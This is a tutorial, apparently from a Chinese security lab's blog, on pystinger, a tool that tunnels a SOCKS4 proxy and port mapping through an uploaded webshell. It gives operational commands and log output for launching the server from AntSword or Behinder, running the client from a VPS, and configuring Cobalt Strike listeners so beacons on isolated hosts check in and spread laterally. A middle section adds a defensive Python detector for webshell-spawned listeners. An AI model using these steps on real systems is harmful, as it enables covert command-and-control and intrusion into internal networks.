Source: Khan安全攻防实验室
pystinger implements an internal-network SOCKS4 proxy and port mapping through a webshell; it can be used directly to bring hosts online in metasploit-framework, viper and cobalt strike.
The main body is written in Python; php, jsp(x) and aspx proxy scripts are currently supported.
Assume the server with no outbound access is reachable at http://example.com:8080 and that its internal IP address is 192.168.3.11.
1. SOCKS4 proxy
Upload proxy.jsp to the target server and confirm that http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蚁剑) or Behinder (冰蝎) with start D:/XXX/stinger_server.exe.
Do not run D:/XXX/stinger_server.exe directly; that causes the TCP connection to drop.
On the VPS run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output like the following indicates success:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
At this point a socks4a proxy into the internal network where example.com sits is listening on the VPS at 127.0.0.1:60000.
At this point the target server's 127.0.0.1:60020 has also been mapped to 127.0.0.1:60020 on the VPS.
2. Cobalt Strike single-host check-in
Upload proxy.jsp to the target server and confirm that http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蚁剑) or Behinder (冰蝎) with start D:/XXX/stinger_server.exe.
Do not run D:/XXX/stinger_server.exe directly; that causes the TCP connection to drop.
On the stinger_client command line run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output identical to the one shown in section 1 indicates success.
Add a listener in Cobalt Strike; for the port, use the Handler/LISTEN port shown under RAT Config in the output (usually 60020), and set the beacon address to 127.0.0.1.
Generate the payload, upload it to the host and run it; the host then checks in.
3. Cobalt Strike multi-host check-in
Upload proxy.jsp to the target server and confirm that http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蚁剑) or Behinder (冰蝎) with start D:/XXX/stinger_server.exe 192.168.3.11.
192.168.3.11 can be replaced with 0.0.0.0.
On the stinger_client command line run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output like the following indicates success:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
Add a listener in Cobalt Strike; for the port, use the Handler/LISTEN port shown under RAT Config (usually 60020), and set the beacon address to 192.168.3.11 (the internal IP address of example.com).
Generate the payload, upload it to the host and run it; the host then checks in.
When moving laterally to other hosts, pointing their payloads at 192.168.3.11:60020 lets hosts without outbound access check in as well.
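The host-side trace of the setup in sections 1 to 3 is that stinger_server.exe is launched from the webshell, so it runs as a descendant of the web server's worker process, and the output shows it binding listeners (SERVER_LISTEN on 60010, MIRROR_LISTEN on 60020, on 192.168.3.11 in the multi-host variant). A web worker's child that opens a listening socket is rare on a well-run server, which makes it a cheap host check. The script below is an added example written for this article, not part of pystinger; it assumes a process table and a listener table collected elsewhere (for instance Get-CimInstance Win32_Process and Get-NetTCPConnection -State Listen on Windows, or ps -eo pid,ppid,comm and ss -ltnp on Linux), and the PIDs, process names and the WEB_WORKERS set are constructed for the example, with ports and the internal IP taken from the page's scenario.

```python
# Process names that normally host web-application code. A descendant of one
# of these that owns a listening socket was most likely started from the web
# application itself (e.g. via a webshell). Constructed for this example;
# adjust to the platform and application server in use.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "php-fpm", "httpd", "java.exe",
               "tomcat8.exe", "tomcat9.exe"}


def web_worker_ancestor(pid, procs):
    """Walk the parent chain of `pid`; return the first web-worker ancestor, or None.

    `procs` maps pid -> {"pid", "ppid", "name"}. A `seen` set guards against
    PID reuse producing a cycle in the recorded parent links.
    """
    seen = set()
    cur = procs.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if cur["pid"] != pid and cur["name"].lower() in WEB_WORKERS:
            return cur
        cur = procs.get(cur["ppid"])
    return None


def find_webshell_spawned_listeners(procs, listeners):
    """Return listeners owned by processes that descend from a web worker."""
    findings = []
    for lst in listeners:
        proc = procs.get(lst["pid"])
        if proc is None:
            continue
        anc = web_worker_ancestor(lst["pid"], procs)
        if anc is None:
            continue
        findings.append({
            "pid": proc["pid"],
            "name": proc["name"],
            "listen": f'{lst["addr"]}:{lst["port"]}',
            "web_worker": anc["name"],
            "web_worker_pid": anc["pid"],
        })
    return findings


# Constructed sample: an IIS worker (w3wp.exe) whose cmd.exe child started
# stinger_server.exe, which then bound the two listeners from the page's output.
SAMPLE_PROCS = {p["pid"]: p for p in [
    {"pid": 4, "ppid": 0, "name": "System"},
    {"pid": 700, "ppid": 4, "name": "svchost.exe"},
    {"pid": 1200, "ppid": 700, "name": "w3wp.exe"},
    {"pid": 3100, "ppid": 1200, "name": "cmd.exe"},
    {"pid": 3120, "ppid": 3100, "name": "stinger_server.exe"},
    {"pid": 2500, "ppid": 700, "name": "spoolsv.exe"},
]}
SAMPLE_LISTENERS = [
    {"pid": 700, "addr": "0.0.0.0", "port": 135},
    {"pid": 3120, "addr": "127.0.0.1", "port": 60010},
    {"pid": 3120, "addr": "192.168.3.11", "port": 60020},
    {"pid": 2500, "addr": "127.0.0.1", "port": 5985},
    {"pid": 9999, "addr": "0.0.0.0", "port": 8443},  # pid missing from table: skipped
]

if __name__ == "__main__":
    for f in find_webshell_spawned_listeners(SAMPLE_PROCS, SAMPLE_LISTENERS):
        print(f"pid {f['pid']} ({f['name']}) listens on {f['listen']}, "
              f"descends from {f['web_worker']} (pid {f['web_worker_pid']})")
```

The check deliberately ignores the worker's own sockets and only flags its descendants, so application servers that legitimately listen are not reported. The complementary preventive control is the one the page's procedure depends on: if the web worker's account cannot spawn cmd.exe, or the server cannot start new processes from the web root at all, the server side of this tunnel never comes up.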
4. Custom headers and proxy
If the webshell requires a Cookie or an Authorization value, set the request headers with the --header parameter:
--header "Authorization: XXXXXX,Cookie: XXXXX"
If the webshell has to be reached through a proxy, set it with --proxy:
--proxy "socks5:127.0.0.1:1081"
stinger_server / stinger_client: windows, linux
proxy.jsp(x)/php/aspx: php7.2, tomcat7.0, iis8.0
Project:
https://github.com/FunnyWolf/pystinger/releases/tag/v1.6